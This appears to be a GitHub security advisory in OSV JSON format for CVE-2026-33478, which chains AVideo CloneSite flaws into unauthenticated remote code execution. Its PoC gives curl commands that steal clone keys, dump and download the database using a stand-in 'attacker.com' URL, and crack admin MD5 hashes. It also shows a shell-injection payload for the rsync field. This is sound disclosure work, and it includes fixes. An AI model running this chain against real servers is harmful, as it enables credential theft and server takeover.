{"id":"GHSA-687q-32c6-8x68","summary":"AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection","details":"## Summary\n\nMultiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands.\n\n## Details\n\n### Step 1: Clone Key Disclosure\n\n`plugin/CloneSite/clones.json.php:1-8` has zero authentication:\n\n```php\n\u003c?php\nrequire_once '../../videos/configuration.php';\nrequire_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';\nheader('Content-Type: application/json');\n$rows = Clones::getAll();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e}\n```\n\nThe response includes the `key` field for every registered clone, which is the sole authentication credential for clone operations.\n\n### Step 2: Database Dump via Stolen Key\n\n`plugin/CloneSite/cloneServer.json.php:73-97` — once the key passes `Clones::thisURLCanCloneMe()`, the server executes `mysqldump` and writes the result to a web-accessible directory:\n\n```php\n$cmd = \"mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} \"\n    .\" --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} \u003e $sqlFile\";\nexec($cmd . \" 2\u003e&1\", $output, $return_val);\n```\n\nThe SQL file path is returned in the JSON response and is downloadable.\n\n### Step 3: Admin Credential Extraction\n\n`objects/user.php:1798` — passwords are stored as unsalted MD5:\n\n```php\n$passEncoded = md5($pass);\n```\n\nThe `users` table in the dump contains `user`, `password` (MD5), and `isAdmin` fields. MD5 hashes crack in seconds.\n\n### Step 4: Command Injection via Rsync\n\n`plugin/CloneSite/cloneClient.json.php:259` — the `videosDir` from the clone server response is interpolated unsanitized into the rsync command:\n\n```php\n$rsync = \"sshpass -p '{password}' rsync -av ... {$objClone-\u003ecloneSiteSSHUser}@{$objClone-\u003ecloneSiteSSHIP}:{$json-\u003evideosDir} ...\";\nexec($cmd . \" 2\u003e&1\", $output, $return_val);\n```\n\nAn admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the `videosDir` field.\n\n## PoC\n\n```bash\n# Step 1: Steal clone keys (unauthenticated)\ncurl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'\n# Output: \"a1b2c3d4e5f6...\"\n\n# Step 2: Trigger database dump\nCLONE_KEY=\"a1b2c3d4e5f6...\"\ncurl -s \"http://target/plugin/CloneSite/cloneServer.json.php\" \\\n  --data \"url=http://attacker.com&key=${CLONE_KEY}&useRsync=0\" | jq '.sqlFile'\n# Output: \"Clone_mysqlDump_1234567890.sql\"\n\n# Step 3: Download the dump and extract admin credentials\ncurl -s \"http://target/videos/clones/Clone_mysqlDump_1234567890.sql\" \\\n  | grep -A2 \"INSERT INTO.*users\" \\\n  | grep -oP \"admin','[a-f0-9]{32}\"\n# Output: admin','5f4dcc3b5aa765d61d8327deb882cf99  (MD5 of \"password\")\n\n# Step 4: Crack MD5 (trivial)\necho -n \"5f4dcc3b5aa765d61d8327deb882cf99\" | hashcat -m 0 -a 0 rockyou.txt\n# Output: password\n\n# Step 5: Login as admin, configure CloneSite with malicious server\n# The attacker's clone server returns videosDir containing: /tmp$(id \u003e /tmp/pwned)\n# When rsync executes, the $(id) is evaluated by the shell\n```\n\n## Impact\n\n- **Complete server compromise**: Unauthenticated attacker achieves arbitrary command execution as the web server user\n- **Full database disclosure**: The entire database (users, videos, configurations, secrets) is exfiltrated\n- **No user interaction**: Every step is automated, no clicks or social engineering required\n- **Credential theft**: All user passwords (MD5) are trivially recoverable\n- **Lateral movement**: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems\n\n## Recommended Fix\n\n1. **Add authentication to `clones.json.php`:**\n```php\n// plugin/CloneSite/clones.json.php\nrequire_once '../../videos/configuration.php';\nif (!User::isAdmin()) {\n    http_response_code(403);\n    die(json_encode(['error' =\u003e true, 'msg' =\u003e 'Admin required']));\n}\n```\n\n2. **Don't store SQL dumps in web-accessible directories** — use a path outside the web root or require re-authentication to download.\n\n3. **Upgrade password hashing** — replace MD5 with `password_hash()` (bcrypt/argon2):\n```php\n// Replace: $passEncoded = md5($pass);\n$passEncoded = password_hash($pass, PASSWORD_DEFAULT);\n```\n\n4. **Sanitize rsync command parameters** — use `escapeshellarg()` on all interpolated values:\n```php\n$rsync = sprintf(\"rsync -av ... %s@%s:%s ...\",\n    escapeshellarg($objClone-\u003ecloneSiteSSHUser),\n    escapeshellarg($objClone-\u003ecloneSiteSSHIP),\n    escapeshellarg($json-\u003evideosDir)\n);\n```","aliases":["CVE-2026-33478"],"modified":"2026-04-08T23:02:03.254698Z","published":"2026-03-20T20:43:50Z","database_specific":{"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-03-20T20:43:50Z","nvd_published_at":"2026-03-23T15:16:34Z","cwe_ids":["CWE-284","CWE-78"]},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33478"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"26.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-687q-32c6-8x68/GHSA-687q-32c6-8x68.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}